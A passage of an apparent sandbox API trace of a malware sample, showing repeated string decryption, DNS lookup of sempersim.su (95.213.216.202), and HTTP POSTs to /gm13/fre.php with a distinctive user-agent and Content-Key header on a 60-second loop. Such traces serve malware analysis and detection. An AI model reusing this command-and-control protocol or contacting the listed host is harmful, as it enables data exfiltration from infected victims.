lpParameter=0x63b6b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x518) returned 0x254 [0083.635] Sleep (dwMilliseconds=0xea60) [0093.649] GetProcessHeap () returned 0x620000 [0093.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643638 [0093.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0093.655] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0093.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0093.671] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63a6e0) returned 1 [0093.682] GetProcessHeap () returned 0x620000 [0093.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fa8 [0093.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0093.683] CryptImportKey (in: hProv=0x63a6e0, pbData=0x638fa8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0093.684] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0093.684] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0093.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0093.685] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0093.685] GetProcessHeap () returned 0x620000 [0093.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fa8 | out: hHeap=0x620000) returned 1 [0093.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0093.687] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643638, pdwDataLen=0x19fcfc | out: pbData=0x643638, pdwDataLen=0x19fcfc) returned 1 [0093.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0093.735] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0093.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0093.745] CryptReleaseContext (hProv=0x63a6e0, dwFlags=0x0) returned 1 [0093.745] GetProcessHeap () returned 0x620000 [0093.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0093.745] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0093.746] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0093.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0093.747] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0093.748] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0093.748] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0093.749] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0093.749] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0093.749] GetProcessHeap () returned 0x620000 [0093.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0093.766] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0093.768] GetProcessHeap () returned 0x620000 [0093.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0093.768] GetProcessHeap () returned 0x620000 [0093.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0093.768] GetProcessHeap () returned 0x620000 [0093.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643638 | out: hHeap=0x620000) returned 1 [0093.769] GetProcessHeap () returned 0x620000 [0093.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642f78 [0093.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0093.770] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0093.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0093.776] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63a6e0) returned 1 [0093.783] GetProcessHeap () returned 0x620000 [0093.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639098 [0093.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0093.784] CryptImportKey (in: hProv=0x63a6e0, pbData=0x639098*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0093.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0093.785] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0093.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0093.786] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0093.786] GetProcessHeap () returned 0x620000 [0093.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639098 | out: hHeap=0x620000) returned 1 [0093.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0093.791] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642f78, pdwDataLen=0x19fcfc | out: pbData=0x642f78, pdwDataLen=0x19fcfc) returned 1 [0093.791] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0093.792] CryptDestroyKey (hKey=0x62d710) returned 1 [0093.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0093.793] CryptReleaseContext (hProv=0x63a6e0, dwFlags=0x0) returned 1 [0093.793] GetProcessHeap () returned 0x620000 [0093.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0093.794] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0093.794] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0093.795] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0093.795] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0093.796] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0093.796] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0093.796] GetProcessHeap () returned 0x620000 [0093.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0093.796] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63bbe0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0093.803] GetProcessHeap () returned 0x620000 [0093.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b540 [0093.803] socket (af=2, type=1, protocol=6) returned 0x278 [0093.804] connect (s=0x278, name=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0093.855] FreeAddrInfoW (pAddrInfo=0x63bbe0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0093.855] GetProcessHeap () returned 0x620000 [0093.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0093.855] GetProcessHeap () returned 0x620000 [0093.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0093.855] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0093.856] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0093.856] GetProcessHeap () returned 0x620000 [0093.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x635e88 [0093.856] GetProcessHeap () returned 0x620000 [0093.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0093.857] GetProcessHeap () returned 0x620000 [0093.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643050 [0093.857] GetProcessHeap () returned 0x620000 [0093.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0093.858] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0093.858] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0093.859] GetProcessHeap () returned 0x620000 [0093.859] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x635f40 [0093.859] GetProcessHeap () returned 0x620000 [0093.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0093.859] send (s=0x278, buf=0x635f40*, len=237, flags=0) returned 237 [0093.860] send (s=0x278, buf=0x6421e0*, len=159, flags=0) returned 159 [0093.860] GetProcessHeap () returned 0x620000 [0093.860] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0093.860] recv (in: s=0x278, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0095.900] GetProcessHeap () returned 0x620000 [0095.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635f40 | out: hHeap=0x620000) returned 1 [0095.900] GetProcessHeap () returned 0x620000 [0095.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643050 | out: hHeap=0x620000) returned 1 [0095.901] GetProcessHeap () returned 0x620000 [0095.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635e88 | out: hHeap=0x620000) returned 1 [0095.901] GetProcessHeap () returned 0x620000 [0095.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0095.903] closesocket (s=0x278) returned 0 [0095.904] GetProcessHeap () returned 0x620000 [0095.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b540 | out: hHeap=0x620000) returned 1 [0095.904] GetProcessHeap () returned 0x620000 [0095.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0095.904] GetProcessHeap () returned 0x620000 [0095.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642f78 | out: hHeap=0x620000) returned 1 [0095.904] GetProcessHeap () returned 0x620000 [0095.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0095.905] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x10e0) returned 0x278 [0095.907] Sleep (dwMilliseconds=0xea60) [0095.913] GetProcessHeap () returned 0x620000 [0095.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643248 [0095.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0095.914] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0095.920] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0095.920] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0095.936] GetProcessHeap () returned 0x620000 [0095.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0095.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0095.937] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0095.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0095.938] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0095.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0095.939] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0095.939] GetProcessHeap () returned 0x620000 [0095.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0095.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0095.941] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643248, pdwDataLen=0x19fcfc | out: pbData=0x643248, pdwDataLen=0x19fcfc) returned 1 [0095.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0095.941] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0095.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0095.942] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0095.942] GetProcessHeap () returned 0x620000 [0095.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0095.943] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0095.943] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0095.947] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0095.947] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0095.948] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0095.948] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0095.949] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0095.949] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0095.949] GetProcessHeap () returned 0x620000 [0095.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0095.949] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0095.950] GetProcessHeap () returned 0x620000 [0095.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0095.950] GetProcessHeap () returned 0x620000 [0095.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0095.951] GetProcessHeap () returned 0x620000 [0095.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643248 | out: hHeap=0x620000) returned 1 [0095.951] GetProcessHeap () returned 0x620000 [0095.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643488 [0095.954] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0095.955] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0095.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0095.980] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bdc0) returned 1 [0095.986] GetProcessHeap () returned 0x620000 [0095.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0095.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0095.987] CryptImportKey (in: hProv=0x63bdc0, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0095.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0095.988] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0095.989] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0095.989] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0095.989] GetProcessHeap () returned 0x620000 [0095.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0095.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0095.993] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643488, pdwDataLen=0x19fcfc | out: pbData=0x643488, pdwDataLen=0x19fcfc) returned 1 [0095.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0095.994] CryptDestroyKey (hKey=0x62d710) returned 1 [0095.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0095.995] CryptReleaseContext (hProv=0x63bdc0, dwFlags=0x0) returned 1 [0095.995] GetProcessHeap () returned 0x620000 [0095.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0095.995] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0095.995] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0095.996] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0095.996] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0095.997] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0095.997] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0095.997] GetProcessHeap () returned 0x620000 [0095.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0095.997] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c640*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0095.999] GetProcessHeap () returned 0x620000 [0095.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b540 [0095.999] socket (af=2, type=1, protocol=6) returned 0x27c [0095.999] connect (s=0x27c, name=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0096.045] FreeAddrInfoW (pAddrInfo=0x63c640*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0096.045] GetProcessHeap () returned 0x620000 [0096.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0096.045] GetProcessHeap () returned 0x620000 [0096.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0096.046] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0096.047] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0096.047] GetProcessHeap () returned 0x620000 [0096.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x636288 [0096.047] GetProcessHeap () returned 0x620000 [0096.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0096.047] GetProcessHeap () returned 0x620000 [0096.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643128 [0096.047] GetProcessHeap () returned 0x620000 [0096.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0096.048] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0096.048] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0096.048] GetProcessHeap () returned 0x620000 [0096.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x636340 [0096.048] GetProcessHeap () returned 0x620000 [0096.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0096.049] send (s=0x27c, buf=0x636340*, len=237, flags=0) returned 237 [0096.051] send (s=0x27c, buf=0x6421e0*, len=159, flags=0) returned 159 [0096.051] GetProcessHeap () returned 0x620000 [0096.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0096.051] recv (in: s=0x27c, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0096.603] GetProcessHeap () returned 0x620000 [0096.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636340 | out: hHeap=0x620000) returned 1 [0096.604] GetProcessHeap () returned 0x620000 [0096.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643128 | out: hHeap=0x620000) returned 1 [0096.604] GetProcessHeap () returned 0x620000 [0096.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636288 | out: hHeap=0x620000) returned 1 [0096.604] GetProcessHeap () returned 0x620000 [0096.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0096.605] closesocket (s=0x27c) returned 0 [0096.605] GetProcessHeap () returned 0x620000 [0096.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b540 | out: hHeap=0x620000) returned 1 [0096.605] GetProcessHeap () returned 0x620000 [0096.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0096.605] GetProcessHeap () returned 0x620000 [0096.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0096.606] GetProcessHeap () returned 0x620000 [0096.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0096.606] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1184) returned 0x27c [0096.608] Sleep (dwMilliseconds=0xea60) [0096.616] GetProcessHeap () returned 0x620000 [0096.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6430e0 [0096.617] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0096.617] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0096.621] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0096.622] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b760) returned 1 [0096.627] GetProcessHeap () returned 0x620000 [0096.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fa8 [0096.628] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0096.628] CryptImportKey (in: hProv=0x63b760, pbData=0x638fa8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0096.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0096.629] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0096.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0096.630] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0096.630] GetProcessHeap () returned 0x620000 [0096.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fa8 | out: hHeap=0x620000) returned 1 [0096.631] LoadLibraryW 